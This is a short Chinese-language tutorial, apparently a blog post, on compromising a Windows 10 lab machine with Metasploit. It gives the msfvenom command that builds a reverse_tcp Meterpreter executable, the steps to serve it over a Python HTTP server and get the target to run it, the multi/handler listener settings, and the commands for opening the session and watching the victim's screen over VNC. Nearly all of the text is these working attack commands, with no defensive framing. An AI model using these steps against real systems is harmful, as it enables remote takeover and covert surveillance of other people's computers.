一、环境
kali2022.4,靶机环境win10物联网企业版,工具:msfvenom、msfconsole、python3
二、具体步骤
1、管理员权限打开终端
![](https://img-blog.csdnimg.cn/img_convert/8bd93da4fc16fa076c5a855d5f84ee9b.png)
2、生成可执行文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=指定端口 -f exe -o test.exe
![](https://img-blog.csdnimg.cn/img_convert/8f9cf02149f0422089b848797292347d.png)
3、在目标靶机下载生成的test.exe程序
1)在kali执行python3 -m http.server
![](https://img-blog.csdnimg.cn/img_convert/7334c7ecdc65bc7f102de7808865acd1.png)
2)在目标靶机进行下载
![](https://img-blog.csdnimg.cn/img_convert/cd249c7b1abe604d1f910682591d46b6.png)
4、执行msfconsole命令
![](https://img-blog.csdnimg.cn/img_convert/7e3240751d501f4521ff3d9242b27577.png)
5、配置参数
use exploit/multi/handler(选择模块)
set payload windows/meterpreter/reverse_tcp(选择攻击模块)
set LhOST 本地ip
set lport 指定端口号
show options(查看配置的参数)
exploit -z -j(后台执行)
6、在靶机运行可执行程序test.exe
![](https://img-blog.csdnimg.cn/img_convert/05f56d1fecb1b71363d0e90cc06ea453.png)
7、执行sessions查看上钩的用户
![](https://img-blog.csdnimg.cn/img_convert/4612f7179c0b567295c784acd5d32c2d.png)
8、执行sessions -i 1进行攻击,出现meterpreter说明你就已经成功的入侵的对方的电脑
9、运行run vnc -i进行远程监控靶机
![](https://img-blog.csdnimg.cn/img_convert/ee011ba79f31d8604936ade1b7ad7025.png)
![](https://img-blog.csdnimg.cn/img_convert/7f8ae26714c0d2f41401e779e1dfb5d0.png)